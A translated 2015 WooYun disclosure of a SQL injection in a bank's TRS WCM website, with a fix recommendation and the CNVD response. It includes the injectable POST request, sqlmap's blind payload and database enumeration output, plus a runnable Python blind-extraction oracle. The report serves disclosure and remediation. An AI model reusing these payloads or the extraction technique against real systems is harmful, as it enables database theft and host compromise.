
Vulnerability summary

Defect ID: wooyun-2015-0143972

Title: POST-type SQL injection on the official website of a bank in Shandong province leaks a large amount of sensitive information (DBA privileges)

Related vendor: tengzhou.gov.cn

Author: 路人甲

Submitted: 2015-09-28 21:27

Fixed: 2015-11-15 16:22

Published: 2015-11-15 16:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-28: Details sent to the vendor, awaiting the vendor's handling
2015-10-01: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the reporting body
2015-10-11: Details disclosed to core white hats and domain experts
2015-10-21: Details disclosed to ordinary white hats
2015-10-31: Details disclosed to intern white hats
2015-11-15: Details disclosed to the public

Brief description:

SQL injection allows the bank's database to be dumped.

Detailed description:

The official website of Tengzhou Rural Commercial Bank (Shandong province) has a POST-type SQL injection that allows the site's database to be dumped, leaking sensitive data.

Proof of vulnerability:

Tengzhou Rural Commercial Bank website: http://**.**.**.**/

(screenshot: 1滕州主页.png, the Tengzhou homepage)


Testing showed that when the following POST request is submitted, the UserName parameter is injectable:

POST /wcm/user/add_newuser.jsp HTTP/1.1
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**
Cookie: JSESSIONID=WH3T1BfR4InOfw14O1YVylbXy1tYfL8f2B6fkC4akEBvouITd7g5!1370318643
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Address=3137%20Laguna%20Street&Email=sample%40email.tst&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa%24%24w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf


The back-end database is Microsoft SQL Server 2000:

sqlmap identified the following injection points with a total of 121 HTTP(s) requests:
---
Place: POST
Parameter: UserName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Address=3137 Laguna Street&Email=sample@email.tst&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa$$w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf' AND 3*2*1=6 AND '000xyfX'='000xyfX' AND 2621=2621 AND 'Wpwg'='Wpwg
---
web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
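To make concrete what "boolean-based blind" means at a DBA-level injection point, here is an added example, not code from the report or from TRS WCM, that models the injectable UserName check with string concatenation and then recovers a password from the WCMUSER table through sqlmap-style true/false probes. sqlite3 stands in for SQL Server 2000 so it runs offline, the table rows are constructed, and vulnerable_username_exists is a hypothetical model of the server-side check; the real add_newuser.jsp code is not on the page.

```python
import sqlite3

# Constructed stand-in for TRSWCM.WCMUSER (column names follow the report's
# schema; the rows are invented for this example). sqlite3 replaces SQL Server
# 2000 so the example runs offline.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE WCMUSER (USERID INTEGER, USERNAME TEXT, PASSWORD TEXT, EMAIL TEXT)"
    )
    con.executemany(
        "INSERT INTO WCMUSER VALUES (?, ?, ?, ?)",
        [
            (1, "admin", "secret1", "admin@example.invalid"),   # constructed row
            (2, "editor", "pw2", "editor@example.invalid"),     # constructed row
        ],
    )
    return con


def vulnerable_username_exists(con, username):
    """Hypothetical model of the check behind add_newuser.jsp: the UserName
    value is concatenated straight into the SQL text, so a single quote in it
    rewrites the WHERE clause. The real TRS WCM code is not on the page."""
    sql = "SELECT COUNT(*) FROM WCMUSER WHERE USERNAME = '" + username + "'"
    return con.execute(sql).fetchone()[0] > 0


class BlindOracle:
    """One boolean-blind probe per call, shaped like sqlmap's payload
    (<value>' AND <condition> AND 'Wpwg'='Wpwg). The application's true/false
    behaviour is the only feedback channel; the request counter shows what
    each extraction costs in HTTP requests."""

    def __init__(self, con, base_value="admin"):
        self.con = con
        self.base_value = base_value   # must select a row, or AND never holds
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        payload = f"{self.base_value}' AND ({condition}) AND 'Wpwg'='Wpwg"
        return vulnerable_username_exists(self.con, payload)

    def extract_int(self, expr, hi=255):
        """Binary-search the integer value of expr using only '>' probes."""
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"({expr}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract_string(self, subquery):
        """Recover a string result one character at a time. On SQL Server 2000
        the equivalent functions are LEN, SUBSTRING and ASCII."""
        length = self.extract_int(f"LENGTH(({subquery}))")
        chars = [
            chr(self.extract_int(f"UNICODE(SUBSTR(({subquery}), {i}, 1))", hi=127))
            for i in range(1, length + 1)
        ]
        return "".join(chars)


def demo():
    """Dump one PASSWORD value blind and report how many probes it took."""
    con = make_db()
    oracle = BlindOracle(con)
    pw = oracle.extract_string("SELECT PASSWORD FROM WCMUSER WHERE USERID = 1")
    return pw, oracle.requests


if __name__ == "__main__":
    password, n = demo()
    print(f"recovered {password!r} with {n} blind requests")
```

Each probe is one HTTP request in the real attack: a seven-character value costs 8 probes for its length plus 7 per character, 57 in all, which is the per-field price sqlmap pays when it dumps a table through this channel. That is why a blind injection with DBA rights is still a complete dump of every database on the server, only a slow one.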


Seven databases in total:

available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] TRSWCM


The current database is TRSWCM (the TRS WCM content management system behind the site), with 85 tables:

current database: 'TRSWCM'
Database: TRSWCM
[85 tables]
+---------------------+
| WCMADDRESS |
| WCMADDRGROUP |
| WCMADDRGRPMAP |
| WCMAPPENDIX |
| WCMBOOKMARK |
| WCMBULLETIN |
| WCMCHANNEL |
| WCMCHANNELSYN |
| WCMCHNLDOC |
| WCMCHNLEXTFIELD |
| WCMCHNLFLOW |
| WCMCHNLTEMP |
| WCMCONFIG |
| WCMCONTACT |
| WCMCONTENTLINK |
| WCMCONTGROUP |
| WCMCONTGRPMAP |
| WCMDBUPDATE |
| WCMDOCBAK |
| WCMDOCKIND |
| WCMDOCREPLY |
| WCMDOCSYN |
| WCMDOCTYPE |
| WCMDOCUMENT |
| WCMEVENT |
| WCMEVENTTYPE |
| WCMEXCELDATA |
| WCMEXPIRATION |
| WCMEXTFIELD |
| WCMFILETYPE |
| WCMFLOW |
| WCMFLOWACTION |
| WCMFLOWBRANCH |
| WCMFLOWDOC |
| WCMFLOWDOCBAK |
| WCMFLOWMONOPER |
| WCMFLOWNODE |
| WCMFLOWNODEOPER |
| WCMFORMFIELDS |
| WCMFORMINFO |
| WCMGROUP |
| WCMGRPUSER |
| WCMHITSCOUNT |
| WCMID |
| WCMJOB |
| WCMLOG |
| WCMLOGTYPE |
| WCMMARKKIND |
| WCMMARKSHARE |
| WCMMEETINGCONT |
| WCMMEETINGROOM |
| WCMMEETINGUSER |
| WCMMESSAGE |
| WCMMSGQUEUE |
| WCMOBJTRIGGER |
| WCMOPER |
| WCMRELATION |
| WCMREPLACE |
| WCMRIGHT |
| WCMRIGHTDEF |
| WCMROLE |
| WCMROLEUSER |
| WCMSCHEDULE |
| WCMSECURITY |
| WCMSITEEXTFIELD |
| WCMSOURCE |
| WCMSTATUS |
| WCMTAGBEANS |
| WCMTASK |
| WCMTASKPOOL |
| WCMTEMPAPDREL |
| WCMTEMPAPPENDIX |
| WCMTEMPLATE |
| WCMTRUSTEEINFO |
| WCMUSER |
| WCMUSERSETTING |
| WCMWEBSITE |
| WCM_ViewCOLUMNS |
| X_TEMP |
| cx |
| dtproperties |
| pangolin_test_table |
| s3_tmp |
| sysconstraints |
| syssegments |
+---------------------+


The current user, buwenwcm, has DBA privileges (on SQL Server, sqlmap's DBA check tests membership of the sysadmin server role). On SQL Server 2000, sysadmin also means xp_cmdshell is available unless an administrator has removed it, so the impact is not limited to reading data: the same injection point can be used to run commands on the Windows host.

Note also the non-WCM tables in the list above (X_TEMP, cx, s3_tmp, pangolin_test_table): pangolin_test_table is the scratch table the Pangolin SQL injection tool creates, which suggests this database had already been worked over by automated injection tooling before this report.

(screenshot: dba用户.png, the DBA check)


The WCMUSER table holds usernames, passwords, e-mail addresses and other account details:

Database: TRSWCM
Table: WCMUSER
[24 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| ADDRESS | nvarchar |
| APPLYTIME | datetime |
| ATTRIBUTE | nvarchar |
| CRTIME | datetime |
| CRUSER | nvarchar |
| EMAIL | nvarchar |
| IFPUBMYINFO | tinyint |
| LOGINTIME | datetime |
| LOGINTIMES | int |
| LOGOUTTIME | datetime |
| MOBILE | nvarchar |
| MSGINTERVAL | smallint |
| NICKNAME | nvarchar |
| PASSWORD | nvarchar |
| PRICE | int |
| REGTIME | datetime |
| REMINDERANSWER | nvarchar |
| REMINDERQUESTION | nvarchar |
| STATUS | tinyint |
| TEL | nvarchar |
| TRUENAME | nvarchar |
| USERID | int |
| USERNAME | nvarchar |
| VIEWINTERVAL | smallint |
+------------------+----------+


I dumped three users as a quick illustration; the records include usernames, passwords, e-mail addresses and so on.

(screenshot: 3个用户.png, three dumped users)


The Northwind database contains 31 tables (Northwind is the sample database Microsoft shipped with SQL Server 2000, so it holds demo data rather than bank data; sqlmap lists its views alongside its tables):

web server operating system: Windows
web application technology: JSP, Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: Northwind
[31 tables]
+--------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Orders |
| Products |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details |
| Order Subtotals |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------+


The pubs database contains 14 tables (pubs is the other SQL Server 2000 sample database; its presence, like Northwind's, shows a default installation that was never cleaned up):

Database: pubs
[14 tables]
+----------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+----------------+


Any of these databases can be browsed at will and dumped in full. Of the seven, four are SQL Server system databases and two are Microsoft samples; the data actually exposed by this host is the TRS WCM content-management database (site users, credentials, content, logs), plus whatever a sysadmin login can reach on the Windows server.
OK, that concludes the proof.

Fix recommendation:

Filtering alone is not enough. Pass UserName and the other form fields to SQL Server through parameterised queries (PreparedStatement in JSP) instead of string concatenation, run the web application under a database login that is not a member of sysadmin, and remove the unused Northwind and pubs sample databases.
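As an added example, not TRS WCM code, here is the same username check written both ways: a hypothetical allow-list USERNAME_RE as the filtering layer and a bound parameter as the actual fix. sqlite3 stands in for SQL Server 2000 and the row is constructed; in JSP the equivalent of the `?` placeholder is PreparedStatement with setString.

```python
import re
import sqlite3

# Assumed allow-list for this demonstration: the report does not say what a
# valid TRS WCM username looks like.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE WCMUSER (USERID INTEGER PRIMARY KEY, USERNAME TEXT)")
    con.execute("INSERT INTO WCMUSER (USERNAME) VALUES ('admin')")  # constructed row
    return con


def username_exists_vulnerable(con, username):
    """The bug class in the report: the value becomes part of the SQL text."""
    sql = "SELECT COUNT(*) FROM WCMUSER WHERE USERNAME = '" + username + "'"
    return con.execute(sql).fetchone()[0] > 0


def username_exists_safe(con, username):
    """Parameterised query: the driver binds the value separately from the
    statement, so a quote in it is just a character in a username."""
    row = con.execute(
        "SELECT COUNT(*) FROM WCMUSER WHERE USERNAME = ?", (username,)
    ).fetchone()
    return row[0] > 0


def add_newuser(con, username):
    """Hypothetical hardened handler: reject malformed names up front (the
    filtering layer), then touch the database only through bound parameters.
    Returns a status string the caller can map to an HTTP response."""
    if not USERNAME_RE.fullmatch(username):
        return "rejected"
    if username_exists_safe(con, username):
        return "exists"
    con.execute("INSERT INTO WCMUSER (USERNAME) VALUES (?)", (username,))
    return "created"


if __name__ == "__main__":
    con = make_db()
    for probe in ("admin' AND 1=1 AND 'Wpwg'='Wpwg", "admin' AND 1=2 AND 'Wpwg'='Wpwg"):
        print(probe, username_exists_vulnerable(con, probe), username_exists_safe(con, probe))
```

Run stand-alone, the vulnerable check answers True then False for the two sqlmap-shaped probes, which is exactly the oracle a blind injection needs, while the parameterised check answers False for both because no user is literally named that. The allow-list is a useful second layer, but the parameter binding is what closes the injection.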

Copyright notice: please credit 路人甲@乌云 when reposting.


Response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-10-01 16:20

Vendor reply:

CNVD has confirmed and reproduced the described issue. It has been passed via CNCERT to the competent authority for banking-sector informatisation, which will coordinate handling with the unit that operates the website, and has also been forwarded to the CNCERT Shandong branch.

Latest status:

None yet